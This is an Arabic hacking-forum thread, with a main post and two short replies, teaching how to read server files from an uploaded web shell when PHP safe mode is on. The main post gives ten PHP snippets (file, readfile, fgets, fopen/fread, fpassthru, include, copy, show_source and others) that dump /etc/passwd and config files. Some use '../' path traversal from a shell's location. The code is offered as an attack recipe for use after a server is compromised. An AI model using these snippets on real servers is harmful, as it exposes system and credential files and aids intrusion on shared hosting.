نسيت كلمة المرور ؟
Join Today
+ الرد على الموضوع
النتائج 1 إلى 3 من 3
Like Tree1Likes
  • 1 Post By BLACK.DEVIL

الموضوع: دوال قرائه الملفات في ال php و تخطي الحمايه .

  1. 12-17-2011 11:17 AM #1
    Shadi ALbtran
    Shadi ALbtran غير متواجد حالياً
    الصورة الرمزية Shadi ALbtran
    تاريخ التسجيل
    Dec 2011
    المشاركات
    53
    مقالات المدونة
    5

    دوال قرائه الملفات في ال php و تخطي الحمايه .

    السلام عليكم


    اليوم ان شاء الله راح نتكلم عن دوال قرائه الملفت في ال php متى نحتاجها؟ وما هي ؟ والشئ اللي نتوقع الحصول عليه منها ؟

    راح ابدأ باخر سوال :

    الشئ اللي نتوقع الحصول عليه منها ؟
    من خلالها بنقدر نعرض محتوى ملفات اليوزر الخاص فينا او الملفات اللي مصرحه للكل ( يعني ما حد يقلي بدي اعرض ملفات يوزر ثاني ع السيرفر - الا في حاله ان السيرفر حمايه 0 ممكن تعرض ملفات يوزر ثاني )


    متى نحتاجها؟
    في حال كان الوضع الامن شغال (السيف مود اون ) وما كنا قادرين نعرض الملفات او نتنقل وفي هاي الحاله نستخدم الدوال حتى نعرض الملفات الطلوبه مثل config او /etc/passwd .
    (لا تنسى لحد الان احنا بنتكلم فقط ع ملفات اليوزر الخاص فينا او الملفات المصرحه للكل )

    ما هي ؟

    الان راح نبدأ نذكرهم ونشرح عن كل وحده وطريقه الاستخدام ( طبعا الا اكون نسيه بعض الدوال اذا تذكرت شي ان شاء اللهراح اذكره )

    1- داله file :

    من خلالها بنقدر نعرض محتوى الملف .

    مثال على استخدامها:

    كود PHP:
    <?php
    $file     "/etc/passwd";

    $output file($file); 

    foreach(     $output as $line 
    {
        echo     $line "<br />\n";
    }
    ?>



    بدل /etc/passwd ب مسار الملف اللي تريد عرضه .


    2- داله readfile :
    اضن من اسمها واضحه ومن خلالها نعرض محتوى الملف .

    مثال على استخدامها:



    كود PHP:
    <?php
    $file     "/etc/passwd";

    $output readfile($file); 

          echo     $output;
    ?>
    بدل /etc/passwd ب مسار الملف اللي تريد عرضه .


    3- داله stream_get_contents :

    هاي الداله تقرى الملف وتضعه في مصفوفه وبعدين انت تقدر تعرضه

    مثال على استخدامها:

    كود PHP:
    <?php 
    if ($stream fopen('/etc/passwd''r')) {
        echo     stream_get_contents($stream, -110);
            fclose($stream);
    }
    ?>


    بدل /etc/passwd ب مسار الملف اللي تريد عرضه .


    4- داله fgets :

    نفس سابقتها مع بعض الاختلافات .

    مثال على استخدامها:

    كود PHP:
    <?php
    $handle     = @fopen("/etc/passwd""r");
    if (    $handle) {
        while ((    $buffer fgets($handle4096)) !== false) {
            echo     $buffer;
        }
        if (!    feof($handle)) {
            echo     "Error: unexpected fgets() fail\n";
        }
            fclose($handle);
    }
    ?>
    بدل /etc/passwd ب مسار الملف اللي تريد عرضه .


    5- داله file_get_contents :

    من خلالها نقدر نعرض محتى ملف او صفحه من داخل السيرفر او خارجه
    (اذا استخدمتها لعرض ملف من خارج السيرفر فراح تحصل على سورس صفحه html فقط )

    مثال على استخدامها:

    كود PHP:
    <?php 
    $homepage     file_get_contents('/etc/passwd');
    echo     $homepage;
    ?>



    بدل /etc/passwd ب مسار الملف اللي تريد عرضه .


    6- داله fopen&fread
    توضيح سريع حتى ما نتوسع في الموضوع هما دالتين الاولى تقرى الملف ع شكل باينري والثانيه تعرض لك الملف اللي تمت قرائته ع شكل txt .

    مثال على استخدامها:



    كود PHP:

    <?php

    $filename     "/etc/passwd"
    $handle fopen($filename"r");
    $contents fread($handlefilesize($filename));
    echo     $contents ;
    fclose($handle);
    ?>

    بدل /etc/passwd ب مسار الملف اللي تريد عرضه .


    7- داله fpassthru :

    نفس سابقتها تقريبا لكن في شي مهم وهو مسار الملف اللي رايح تقرائه يعني نفرض ان مسارك في السيرفر مثل هيك

    كود PHP:
    /home/gaza/html/img/shell.php 
    وتحتاج تقرأ ملف ال

    كود PHP:
    /etc/passwd 

    فلازم تشوف كم مجلد يفصلك عن الروت
    يعني في مثالنا تاخذ مسار الشل وتبدل اسماء المجلدات ب ../ مثل هيك

    كود PHP:
    ../../../../etc/passwd 
    وفي الاخر وضعنا مسار الملف اللي بدنا نعرضه /etc/passwd

    مثال على استخدامها:

    كود PHP:
    <?php
    $name     '../../../../../../etc/passwd';
    $fp fopen($name'rb');
    header("Content-Type: php");
    header("Content-Length: " filesize($name));
    fpassthru($fp);
    exit;
    ?>
    8- داله include :

    طبعا اتوقع الجميع سمع فيها مش محتاجه شرح هاي الداله بتخليك تستخدم ملف اخر في صفحتك وتنفذ الكود اللي فيه لكن في حالتنا هون حنعرضه بس .

    مثال على استخدامها :

    كود PHP:
    <?php
    include '../../../../../../etc/passwd';
    ?>
    بالنسبه ل مسار الملف فهو مثل ما شرحنا في الداله السابقه

    9- داله copy :
    ايضا داله مشهوره واغلبكم استخدمها في هاي الحاله حننسخ الملف المطلوب ل المجلد اللي احنا فيه ونغير امتداده ونخليه مثلا txt وتستعرضه عن طريق المتصفح .

    مثال على استخدامها :

    كود PHP:
    <?php
    $file     '../../../../../../etc/passwd';
    $newfile '2.txt';

    if (!    copy($file$newfile)) { 
        echo     "failed to copy $file...\n";
    }
    ?>
    يعني في ه المثال نسخنا ملف passwd ل ملف 2.txt وحتلاقيه في نفس المجلد اللي انت شغال عليه استعرضه عن طريق المتصفح .


    10- داله show_source :

    صراحه هي اجمل داله بينهم كلهم تعرض لك المحتوى بالالوان وبشكل منسق

    مثال على استخدامها :

    كود PHP:
    <?php 
    show_source    ('/etc/passwd');
    ?>


    بدل /etc/passwd ب مسار الملف اللي تريد عرضه .


    * طبعا استخدامك ل الدوال هذى محصور بالدوال المسموحه في السيرفر يعني تشوف اي وحده من الدوال هذه مسموح وتستخدمه .

    وهيك نكون انتهينا من دوال قرائه الملفات في ال php ان شاء الله يكون الجميع يستفيد منها

    الامثله كلها مرفقه مع الموضوع


    تقبلو تحياتي

    منظمة نسور الهكر

    Shadi ALbtran
    الملفات المرفقة
    لاَ خيًرٍٍ فُيَ كًاتِمً الًعٌلًمً

    • احترامك للقوانين دليل على وعيــك ورقــي تفكيـــرك .
    • احرص ان تكون انت من يلزم الاعضاء بفهم القوانين .
    • المنتدى لكم وانشأ من اجلكم فحافظوا على بقاءه .
    اللهم من اعتز بك فلن يذل ، ومن اهتدى بك فلن يضل ، ومن استكثر بك فلن يقل ، ومن استقوى بك فلن يضعف ،
    ومن استغنى بك فلن يفتقر، ومن استنصر بك فلن يخذل ، ومن استعان بك فلن يغلب ، ومن توكل عليك فلن يخيب ،
    ومن جعلك ملاذه فلن يضيع ، ومن اعتصم بك فقد هدى إلى صراط مستقيم،اللهم فكن لنا وليا ونصيرا ، وكن لنا معينا ومجيرا ،
    إنك كنت بنا بصيرا
    اللهم صل و سلم و بارك علي سيدنا محمد و علي آله
    و صحبه و سلم و الحمد لله رب العالمين
    رد مع اقتباس رد مع اقتباس
  2. 12-18-2011 11:28 AM #2
    BLACK.DEVIL
    BLACK.DEVIL غير متواجد حالياً
    نســــر جــديــــد
    تاريخ التسجيل
    Dec 2011
    المشاركات
    7
    بارك الله في جهودك ومشكوووووور اخي شادي
    Shadi ALbtran likes this.
    رد مع اقتباس رد مع اقتباس
  3. 12-18-2011 11:31 AM #3
    Shadi ALbtran
    Shadi ALbtran غير متواجد حالياً
    الصورة الرمزية Shadi ALbtran
    تاريخ التسجيل
    Dec 2011
    المشاركات
    53
    مقالات المدونة
    5
    اقتباس المشاركة الأصلية كتبت بواسطة BLACK.DEVIL مشاهدة المشاركة
    بارك الله في جهودك ومشكوووووور اخي شادي
    تسلم يا غالي

    منوووووور الصفحه

    تحياتي
    لاَ خيًرٍٍ فُيَ كًاتِمً الًعٌلًمً

    • احترامك للقوانين دليل على وعيــك ورقــي تفكيـــرك .
    • احرص ان تكون انت من يلزم الاعضاء بفهم القوانين .
    • المنتدى لكم وانشأ من اجلكم فحافظوا على بقاءه .
    اللهم من اعتز بك فلن يذل ، ومن اهتدى بك فلن يضل ، ومن استكثر بك فلن يقل ، ومن استقوى بك فلن يضعف ،
    ومن استغنى بك فلن يفتقر، ومن استنصر بك فلن يخذل ، ومن استعان بك فلن يغلب ، ومن توكل عليك فلن يخيب ،
    ومن جعلك ملاذه فلن يضيع ، ومن اعتصم بك فقد هدى إلى صراط مستقيم،اللهم فكن لنا وليا ونصيرا ، وكن لنا معينا ومجيرا ،
    إنك كنت بنا بصيرا
    اللهم صل و سلم و بارك علي سيدنا محمد و علي آله
    و صحبه و سلم و الحمد لله رب العالمين
    رد مع اقتباس رد مع اقتباس

 
« - | قوانين قسم اختراق الاجهزة »

معلومات الموضوع

الأعضاء الذين يشاهدون هذا الموضوع

الذين يشاهدون الموضوع الآن: 1 (0 من الأعضاء و 1 زائر)

المفضلات

المفضلات

ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك

قوانين المنتدى

RSS RSS 2.0 XML MAP HTML PHP MAP.2 XML.2

Content Relevant URLs by vBSEO 3.6.0